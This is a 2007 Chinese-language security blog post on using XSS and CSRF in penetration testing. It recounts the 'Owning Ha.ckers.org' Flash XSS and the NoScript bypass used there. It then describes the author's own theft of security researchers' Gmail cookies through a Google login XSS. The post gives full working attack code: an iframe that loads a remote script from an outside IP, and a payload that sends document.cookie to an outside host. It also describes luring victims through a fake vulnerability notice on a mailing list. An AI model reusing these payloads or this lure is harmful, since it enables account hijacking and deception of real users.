xss/csrf in penetration test创建时间:2007-11-29 文章属性:原创 文章提交:HeiGe (hack-520_at_163.com) xss/csrf in penetration test author: superhei date: 2007-11-29 team:http://www.ph4nt0m.org blog:http://superhei.blogbus.com 一.Owning Ha.ckers.org 前段时间在Sirdarckcat和Kuza55一起"Owning Ha.ckers.org"中,就是利用xss等的攻击进行渗透[然后没有成功,但是里面的技术细节值得学习],具体技术细节请参考: 1.Sirdarckcat的 blog:http://sirdarckcat.blogspot.com/2007/11/inside-history-of-hacking-rsnake-for.html 2.rSnake的blog:http://ha.ckers.org/blog/20071104/owning-hackersorg-or-not/ 首先他们利用了以前rsnake用来测试xss的一个flash:http://ha.ckers.org/xss.swf [现在已经拒绝访问了],由于这个flash本身存在一个xss[Cross Site Flashing:请参考Stefano Di Paola的文档Testing Flash Applications],as2的代码like this: getURL("javascript:alert('xss')", "_self", "GET"); stop(); 在"Flash Lite 2.x ActionScript 语言参考"里有这样的描叙http://livedocs.adobe.com/flashlite/2_cn/main/00000160.html: <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< getURL(url:String [, window:String [, method:String] ]) :Void ..... method:String [可选] -- 用于发送变量的 GET 或 POST 方法。如果没有变量,则省略此参数。GET 方法将变量追加到 URL 的末尾,它用于发送少量的变量。POST 方法在单独的 HTTP 标头中发送变量,它用于发送大量的变量。 <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 当我们指定第3个参数method:String 为get或者post,可以提交变量追加到url末尾,这个也就意味着getURL函数的url可以injection something :). 我们回到xss.swf 我们提交: xss.swf?a=0:0;eval(alert('xss'); as2里:getURL("javascript:alert('xss')?a=0:0;eval(alert('xss');", "_self", "GET"); 注意那个?和后面都加到了url的后面,Sirdarckcat使用js的一个3元条件a=0:0;巧妙的闭和了语句. demo: http://60.190.243.111/superhei/xss/xss.swf?a=0:0;eval(alert('xss2')); 成功完成了xss. 在Sirdarckcat的poc里使用的是: <iframe src="http://ha.ckers.org/xss.swf?a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name;" name="....[playload]"></iframe> 这里他们认为rSnake使用ff+noscript,所以使用上面pass noscript,当然现在noscript已经修补了这个bug. a=0:0;a/**/setter=eval;b/**/setter=atob;a=b=name; 这个也就是 eval(atob(window.name)). atob=decode base64 这个又是他们的一个技巧,使用编码饶过一些检测 .. 他的playload好象就是利用一个csrf发了一个blog? 具体没有去看wp的代码 :). 在irc里我问过Sirdarckcat为什么他不用,得到cookie然后欺骗进后台,他说好象是后台可能禁止了他的ip登陆. 在整个过程,Sirdarckcat和Kuza55利用了n个细节来达到目的,因为他们的目标也是一位xss的牛人,比如还先利用了css来取浏览器的访问历史,来判断目标是不是进过后台[利用css的目的是no script] 等等.... 二.Owning Some-Hacks's Gmail 也是前段时间jx发现了google登陆口的一个xss: http://www.xfocus.net/articles/200711/957.html,在xf公布之前,我使用这个bug测试一下,结果我得到了国内很多搞安全的人的gmail的cookie :) xss点: https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default<mplcache=2&passive=truel#"></script><script>alert('xss')</script>&1-=1 利用:经常测试发现这个是一个https的xss,在ie下使用iframe调用时得不到gmail的cookie[当然利用利用jx那文章里提到的window.location但是不够隐蔽],我们的目标是搞安全的,一般的安全意识还是有的,而且现在搞安全的一般都是使用ff,因为ie太不安全,所以我决定先只考虑ff.... 创建iframe的代码如下[感谢luoluo的指点:)]: <html><body> <iframe src="" id="f"></iframe> <script> foourl=''; document.getElementById("f").src='https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl<mpl=default<mplcache=2&passive=truel#"></sc'+'ript><scr'+'ipt src="http://60.190.243.111/superhei/ieav/gm.js"></scr'+'ipt>';alert(document.getElementById("f").src);document.getElementById("f").style.width = 0;document.getElementById("f").style.height = 0; </script> </body> </html> 我的playload放在远程的一个js里:http://60.190.243.111/superhei/ieav/gm.js 那么怎么让目标访问呢,哈哈,这里幻影的maillist帮了我一个大忙,maillist简直都是我测试的理想场所 . 首先我在maillist发了一个phpcms的漏洞公告,里面的内容就是一个link:http://60.190.243.111/superhei/ieav/phpcms.htm,这里phpcms.htm里有我发现的phpcms漏洞的简单分析[由于只是测试,我没有发很引诱人的东西,如ie0day什么的,分析也写的很简单],当然也有我上面构造的xss的代码. 我们看看真正的playload:http://60.190.243.111/superhei/ieav/gm.js的代码: getURL("http://xxx.com/test.asp?cn="+encodeURIComponent(document.cookie)); function getURL(s) { var image = new Image(); image.style.width = 0; image.style.height = 0; image.src = s; } 利用Image发送cookie. 然后在maillist发布我的贴以后,我就去上晚班了,等我第2天早上9:00下班后,发现我的数据库里躺着n个人的cookie :) 在整个过程,我以为我的行为会被人发现,遗憾的是一直没有人跟贴反应,只有一个朋友我们的boy同学用noscript拦截了我的攻击,说实话开始之前我对noscript一无所知,所以根本没有考虑,由此国内安全人员自己的安全意识也要加强了. 这个攻击其实没什么新东西 也没有Sirdarckcat那么的技术细节考虑但是效果还是明显的,回想起以前lis0利用xss进我163的mail时,可能也是利用了相同的伎俩? 三.后话 xss和csrf是我见过最卑鄙无耻的攻击方法,尤其是csrf[虽然上面的例子没有涉及],这个也是我一直bs它们的理由,在bs他们的同时我们应该去了解他们,因为'黑客无处不在' :) 在国内好多人在提到xss的时候只是来个alert,真正利用还是很麻烦,而且真正用到渗透测试中更加少了...,不过我有理由相信在以后的渗透测试里,会出现更加多xss/csrf等等 攻击手段. [最好,感谢和我一起交流,一起学习的朋友们!] |
